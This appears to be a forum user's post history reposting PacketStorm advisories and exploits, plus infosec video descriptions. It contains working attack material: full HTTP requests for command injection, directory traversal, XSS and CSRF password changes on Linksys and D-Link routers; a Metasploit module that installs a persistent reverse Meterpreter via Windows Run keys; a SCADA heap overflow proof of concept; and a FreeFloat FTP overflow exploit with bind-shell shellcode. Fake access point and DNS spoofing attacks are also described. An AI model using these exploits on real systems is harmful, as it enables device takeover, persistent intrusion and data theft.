- tested Beta version 18.11.2012 - informed Linksys about the results 30.11.2012 - reported the same OS Command injection vulnerability in model E2500 10.12.2012 - /me requested update of the progress 23.12.2012 - Update to Linksys with directory traversal vulnerability 09.01.2013 - Case closed 05.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
  9. Praetorian503
    Linksys WRT160N suffers from cross site scripting, cross site request forgery, and remote command injection vulnerabilities. Device Name: Linksys WRT160Nv2 Vendor: Linksys/Cisco ============ Device Description: ============ Best For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media Features: * Fast Wireless-N connectivity frees you to do more around your home * Easy to set up and use, industrial-strength security protection * Great for larger homes with many users Source: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm ============ Vulnerable Firmware Releases: ============ Firmware Version: v2.0.03 build 009 ============ Shodan Torks ============ Shodan Search: WRT160Nv2 => 4072 results ============ Vulnerability Overview: ============ * OS Command Injection => parameter: ping_size The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/Diagnostics.asp Authorization: Basic XXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 181 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip= Change the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF): http://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e100|&ping_times=5&traceroute_ip= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png * Directory traversal: => parameter: next_page Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device. Request: POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/Wireless_Basic.asp Authorization: Basic XXXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 77 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version Response: HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 02:53:16 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png * XSS Injecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. => Setup => DDNS => parameter ddns_enable POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/DDNS.asp Authorization: Basic XXXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 122 submit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable='%3balert('pwnd')// => Setup => Basic Setup => parameter need_reboot POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/index.asp Authorization: Basic XXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 568 pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot='%3balert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08+1+1&_daylight_time=1 => Administration => Diagnostics => parameter ping_ip and ping_size POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/Diagnostics.asp Authorization: Basic XXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 201 submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1'><script>alert(2)</script>&ping_size=32'><script>alert(1)</script>&ping_times=5&traceroute_ip= It is possible that there are much more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities. * For changing the current password there is no request of the current password => parameter: http_passwd and http_passwdConfirm With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. POST /apply.cgi HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.233/Management.asp Authorization: Basic XXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 250 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management: http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ Dezember 2012 - discovered vulnerability 23.12.2012 - Contacted Linksys and give them detailed vulnerability details 11.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
  10. Praetorian503
    D-Link DIR-615 rev H suffers from cross site request forgery, information disclosure, and remote command injection vulnerabilities. Device Name: DIR-615 - Hardware revision H1 Vendor: D-Link ============ Device Description: ============ Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network. Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router ============ Vulnerable Firmware Releases: ============ Firmware Version : 8.04, Tue, 4, Sep, 2012 Firmware Version : 8.04, Fri, 18, Jan, 2013 ============ Vulnerability Overview: ============ * OS-Command Injection: => Parameter: ping_ipaddr The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= Request: GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.178.199/adv_virtual_batch.htm Connection: keep-alive Response: HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript" src="common.js.htm"></script> <script language="javascript"> CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS}); var pingResult="Domain"; var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<== var vctinfo= [ {ethport:'0', status:'0', rate:'0', dup:'0'}, {ethport:'1', status:'0', rate:'0', dup:'0'}, {ethport:'2', status:'0', rate:'0', dup:'0'}, You have wget on the device for downloading further tools. * Information Disclosure: Detailed device information with configuration details. Request: http://192.168.178.199/gconfig.htm Response: var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} * For changing the current password there is no request to the current password With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. POST /tools_admin.htm HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/tools_admin.htm Cookie: uid=wBIfbpFoJ9 Content-Type: application/x-www-form-urlencoded Content-Length: 77 page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615 * CSRF for changing the password without knowing the current one: http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ November 2012 - discovered vulnerability 11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support 20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link 21.12.2012 - D-link responded that they will check the findings *h00ray* 11.01.2013 - requested status update 25.01.2013 - requested status update 25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix xx.02.2013 - no update from dlink, public release ===================== Advisory end ===================== Source: PacketStorm
  11. Praetorian503
    Linksys WAG200G suffers from cross site scripting and remote command injection vulnerabilities. Device Name: Linksys WAG200G Vendor: Linksys/Cisco ============ Device Description: ============ The WAG200G is a Linksys Wireless-G ADSL Home Gateway which has a high-speed ADSL2+ modem that gives you a fast connection to the Internet. Source: http://homesupport.cisco.com/en-us/support/gateways/WAG200G ============ Vulnerable Firmware Releases ============ Firmware-Version: v1.01.06 ============ Shodan Torks ============ Shodan Search: WAG200G ============ Vulnerability Overview: ============ * OS Command Injection => Parameter timer_interval=`%20ping%20-c2%20192%2e168%2e178%2e104%20` The vulnerability is caused by missing input validation in the timer_interval parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: POST /setup.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/setup.cgi?next_file=Setup.htm Authorization: Basic ######### Content-Type: application/x-www-form-urlencoded Content-Length: 1051 Connection: close wan_encapmode=pppoa&wan_multiplex=llc&pppoa_multiplex=vc&wan_qostype=ubr&wan_autodetect=enable&dsl_modulation=MMODE&bridged_dhcpenable=dhcp&ipppoe_enable=0&PoeUserName=admin&PoePasswd=admin&pppoeDODC=pppoeDODC&poeIdleTime=5&hostname=test&domainname=&mtu_type=auto&lan_ip_1=192&lan_ip_2=168&lan_ip_3=178&lan_ip_4=199&lan_mask=0&lan_dhcp=disable&time_zone=%2B0+2&timer_interval=`%20ping%20192%2e168%2e178%2e104%20`&upgrade_langpkt=1&save=Save+Settings&c4_wan_ip_=&c4_wan_mask_=&c4_wan_gw_=&c4_wan_dns1_=&c4_wan_dns2_=&c4_lan_ip_=192.168.178.199&c4_dhcpserver_ip_=&c4_static_dns0_=&c4_static_dns1_=&c4_static_dns2_=&c4_wan_wins_=&h_wan_encapmode=pppoa&h_wan_multiplex=llc&h_pppoa_multiplex=vc&h_wan_qostype=ubr&h_wan_autodetect=enable&h_dsl_modulation=MMODE&h_bridged_dhcpenable=dhcp&h_pppoeDODC=pppoeDODC&h_mtu_type=auto&h_lan_mask=0&h_lan_dhcp=disable&h_time_zone=%2B0+2&h_auto_dls=disable&PppoeUserName=&PppoePasswd=&PppoaUserName=admin&PppoaPasswd=admin&h_ipppoe_enable=0&h_upgrade_langpkt=1&todo=save&this_file=Setup.htm&next_file=Setup.htm&message= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WAG200-os-command-injection.png * For changing the password there is no request to the current password. With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. * Stored XSS Injecting scripts into the parameter policy_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. Access Restrictions -> Enter Policy Name => the script gets executed under Status -> Wireless POST /setup.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/setup.cgi?next_file=AccessRes.htm Authorization: Basic xxx= Content-Type: application/x-www-form-urlencoded Content-Length: 584 access_policy=1&f_status1=enable&policy_name=123"><img%20src%3d"0"%20onerror%3dalert("XSSed1")>&f_status2=deny&time=settimes&starthour=0&startminute=0&endhour=0&endminute=0&save=Save+Settings&h_access_policy=1&h_f_status1=enable&h_f_status2=deny&h_alldays=disable&h_sun=disable&h_mon=disable&h_tue=disable&h_wed=disable&h_thurs=disable&h_fri=disable&h_sat=disable&h_time=settimes&h_starthour=0&h_startminute=0&h_endhour=0&h_endminute=0&h_blocked_service0=None&h_blocked_service1=None&h_svc_type0=icmp&h_svc_type1=icmp&todo=save&this_file=AccessRes.htm&next_file=AccessRes.htm&message= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WAG200-stored-xss-access-restrictions.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-016 Twitter: @s3cur1ty_de ============ Time Line: ============ October 2012 - discovered vulnerability 16.10.2012 - contacted Linksys and give them detailed vulnerability details 16.10.2012 - Linksys responded with case number 13.11.2012 - /me requested update of the progress 15.11.2012 - Case closed 08.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
  12. Praetorian503
    This Metasploit module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry include Exploit::EXE def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Persistent Payload Installer', 'Description' => %q{ This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> "Oct 19 2011" )) register_options( [ OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]), OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), ], self.class) end # Exploit Method for when exploit command is issued def exploit print_status("Running module against #{sysinfo['Computer']}") rexename = datastore['REXENAME'] delay = datastore['DELAY'] reg_val = datastore['REG_NAME'] @clean_up_rc = "" host,port = session.session_host, session.session_port exe = generate_payload_exe script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay}) script_on_target = write_script_to_target(script,rexename) if script_on_target == nil # exit the module because we failed to write the file on the target host. return end # Initial execution of script if target_exec(script_on_target) == nil # Exit if we where not able to run the payload. return end case datastore['STARTUP'] when /USER/i regwrite = write_to_reg("HKCU", script_on_target, reg_val) # if we could not write the entry in the registy we exit the module. if not regwrite return end when /SYSTEM/i regwrite = write_to_reg("HKLM", script_on_target, reg_val) # if we could not write the entry in the registy we exit the module. if not regwrite return end end clean_rc = log_file() file_local_write(clean_rc,@clean_up_rc) print_status("Cleanup Meterpreter RC File: #{clean_rc}") report_note(:host => host, :type => "host.persistance.cleanup", :data => { :local_id => session.sid, :stype => session.type, :desc => session.info, :platform => session.platform, :via_payload => session.via_payload, :via_exploit => session.via_exploit, :created_at => Time.now.utc, :commands => @clean_up_rc } ) end # Function for creating log folder and returning log path def log_file(log_path = nil) #Get hostname host = session.sys.config.sysinfo["Computer"] # Create Filename info to be appended to downloaded files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for the logs if log_path logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) else logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) end # Create the log directory ::FileUtils.mkdir_p(logs) #logfile name logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc" return logfile end # Writes script to target host def write_script_to_target(vbs,name) tempdir = expand_path("%TEMP%") if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" end begin write_file(tempvbs, vbs) print_good("Persistent Script written to #{tempvbs}") @clean_up_rc << "rm #{tempvbs}\n" rescue print_error("Could not write the payload on the target hosts.") # return nil since we could not write the file on the target host. tempvbs = nil end return tempvbs end # Executes script on target and return the PID of the process def target_exec(script_on_target) execsuccess = true print_status("Executing script #{script_on_target}") # error handling for process.execute() can throw a RequestError in send_request. begin if datastore['EXE::Custom'].nil? session.shell_command_token(script_on_target) else session.shell_command_token("cscript \"#{script_on_target}\"") end rescue print_error("Failed to execute payload on target host.") execsuccess = nil end return execsuccess end # Installs payload in to the registry HKLM or HKCU def write_to_reg(key,script_on_target, registry_value) # Lets start to assume we had success. write_success = true if registry_value.nil? nam = Rex::Text.rand_text_alpha(rand(8)+8) else nam = registry_value end print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") if(key) set_return = registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") if set_return print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") else print_error("Failed to make entry in the registry for persistence.") write_success = false end else print_error("Error: failed to open the registry key for writing") write_success = false end end end Source: PacketStorm
  13. Praetorian503
    Schneider Electric Accutech Manager heap overflow proof of concept exploit. #Schneider Electric #Accutech Manager Server Heap Overflow PoC #RFManagerService - Port: 2537 #I think this is the same vuln that ExodusIntel discovered. Credit also goes to Aaron Portnoy, ExodusIntel. #The patch has not been released yet. #Evren Yalcin, Signalsec Ltd. (www.signalsec.com) #Download app: #http://telemetry.schneider-electric.com/id2/media/downloads/software/scadarange/Accutech%20Manager%201.89.2.zip import socket import sys host = "192.168.163.128" port = 2537 buf = "\x41" * 400 req = ("GET /" + buf + " HTTP/1.1\r\n" "Host: " + host + ":" + str(port) + "\r\n") print " [+] Connecting to %s:%d" % (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(req) data = s.recv(1024) s.close() #(d40.e8c): Access violation - code c0000005 (!!! second chance !!!) #eax=41414141 ebx=00fd0000 ecx=41414141 edx=0b2999a8 esi=0b2999a0 edi=00000005 #eip=7c91142e esp=0ba3fc28 ebp=0ba3fe48 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #7c91142e 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=???????? #----snip---- #text:0040DE91 push offset aReceivedReques ; "Received request, parsing...\n" #.text:0040DE96 call nullsub_1 #.text:0040DE9B lea eax, [ebp+cbTransfer] #.text:0040DEA1 push eax ; char * ; GET /AAAAAAAAAAAAAAAAAAAAAAAAA #.text:0040DEA2 push esi ; int #.text:0040DEA3 call sub_40E006 #.text:0040DEA8 add esp, 0Ch #----snip--- #call sub_40E006 function copies GET data to staticaly sized heap buffer. Source: PacketStorm
  14. Praetorian503
    FreeFloat FTP version 1.0 raw command buffer overflow exploit. #!/usr/bin/env python # Exploit Title: FreeFloat FTP raw commands buffer overflow # Date: 10 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.freefloat.com/ # Version: FreeFloat FTP 1.0 # Tested on: Windows XP Pro SP2, English # # Description: # FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and # execute arbitrary code when a long and invalid raw command is sent to it. # import socket, struct, sys if len(sys.argv) < 3: print "usage: %s IP port" % (sys.argv[0]) sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) # Bind shellcode generated with msfvenom: # msfvenom -p windows/shell_bind_tcp # -b "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d" # -e x86/fnstenv_mov # # [*] x86/fnstenv_mov succeeded with size 366 (iteration=1) shellcode = ( "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc8" + "\x4c\xab\x8c\x83\xeb\xfc\xe2\xf4\x34\xa4\x22\x8c\xc8\x4c" + "\xcb\x05\x2d\x7d\x79\xe8\x43\x1e\x9b\x07\x9a\x40\x20\xde" + "\xdc\xc7\xd9\xa4\xc7\xfb\xe1\xaa\xf9\xb3\x9a\x4c\x64\x70" + "\xca\xf0\xca\x60\x8b\x4d\x07\x41\xaa\x4b\x2a\xbc\xf9\xdb" + "\x43\x1e\xbb\x07\x8a\x70\xaa\x5c\x43\x0c\xd3\x09\x08\x38" + "\xe1\x8d\x18\x1c\x20\xc4\xd0\xc7\xf3\xac\xc9\x9f\x48\xb0" + "\x81\xc7\x9f\x07\xc9\x9a\x9a\x73\xf9\x8c\x07\x4d\x07\x41" + "\xaa\x4b\xf0\xac\xde\x78\xcb\x31\x53\xb7\xb5\x68\xde\x6e" + "\x90\xc7\xf3\xa8\xc9\x9f\xcd\x07\xc4\x07\x20\xd4\xd4\x4d" + "\x78\x07\xcc\xc7\xaa\x5c\x41\x08\x8f\xa8\x93\x17\xca\xd5" + "\x92\x1d\x54\x6c\x90\x13\xf1\x07\xda\xa7\x2d\xd1\xa0\x7f" + "\x99\x8c\xc8\x24\xdc\xff\xfa\x13\xff\xe4\x84\x3b\x8d\x8b" + "\x37\x99\x13\x1c\xc9\x4c\xab\xa5\x0c\x18\xfb\xe4\xe1\xcc" + "\xc0\x8c\x37\x99\xfb\xdc\x98\x1c\xeb\xdc\x88\x1c\xc3\x66" + "\xc7\x93\x4b\x73\x1d\xc5\x6c\xbd\x13\x1f\xc3\x8e\xc8\x5d" + "\xf7\x05\x2e\x26\xbb\xda\x9f\x24\x69\x57\xff\x2b\x54\x59" + "\x9b\x1b\xc3\x3b\x21\x74\x54\x73\x1d\x1f\xf8\xdb\xa0\x38" + "\x47\xb7\x29\xb3\x7e\xdb\x41\x8b\xc3\xf9\xa6\x01\xca\x73" + "\x1d\x24\xc8\xe1\xac\x4c\x22\x6f\x9f\x1b\xfc\xbd\x3e\x26" + "\xb9\xd5\x9e\xae\x56\xea\x0f\x08\x8f\xb0\xc9\x4d\x26\xc8" + "\xec\x5c\x6d\x8c\x8c\x18\xfb\xda\x9e\x1a\xed\xda\x86\x1a" + "\xfd\xdf\x9e\x24\xd2\x40\xf7\xca\x54\x59\x41\xac\xe5\xda" + "\x8e\xb3\x9b\xe4\xc0\xcb\xb6\xec\x37\x99\x10\x7c\x7d\xee" + "\xfd\xe4\x6e\xd9\x16\x11\x37\x99\x97\x8a\xb4\x46\x2b\x77" + "\x28\x39\xae\x37\x8f\x5f\xd9\xe3\xa2\x4c\xf8\x73\x1d\x4c" + "\xab\x8c" ) # EIP overwritten at offset 251 # JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English jmpesp = struct.pack("<I", 0x7CA58265) buf = "\x41" * 251 + jmpesp + "\x90" * 129 + shellcode print "[+] exploiting target %s:%d" % (ip, port) print "[+] try connecting to %s on port 4444" % (ip) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.recv(1024) s.send(buf + "\r\n") Source: PacketStorm
  15. Praetorian503
    Description: In this video Invincea team talking about how you can defend against the adobe flash 0day vulnerability and Invincea proving that you can stop the exploit without any signature. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Defending Against The Adobe Flash 0day
  16. Praetorian503
    Description: In this video I will show you how to create a Fake AP and using Ettercap we will use Metasploit Browser Exploitation. When Victim trying to visit any website that you have spoofed so it will redirect to our malicious page for exploitation and maybe he will think page is loading. Lot more stuff you can perform using Fake AP and there are lots of people how what free internet access at public places. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Fake -- Ap + Dns Spoof + Browser Exploitation
  17. Praetorian503
    Description: In this video I will show you how to use txdns tool for brute-force attack on subdomains. TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: > Typos: Mised, doouble and transposde keystrokes; > TLD/ccSLD rotation; > Dictionary attack; > Full Brute-force attack: alpha, numeric or alphanumeric charsets. Source : - TXDNS, an aggressive multithreaded DNS digger. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Txdns Aggressive Multithreaded Dns Digger
  18. Praetorian503
    Daca scanezi si crypterele tot pe virustotal, e clar. Daca te uiti mai atent vei vedea ca deja s-a facut asa ceva. Cu toate astea prefer NoVirusThanks, iar pentru cryptere elementscanner
  19. Praetorian503
    Description: Online documentation: OWASP Bricks content page #1 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owasp Bricks - How To Solve The Third Challenge: Content Page #1
  20. Praetorian503
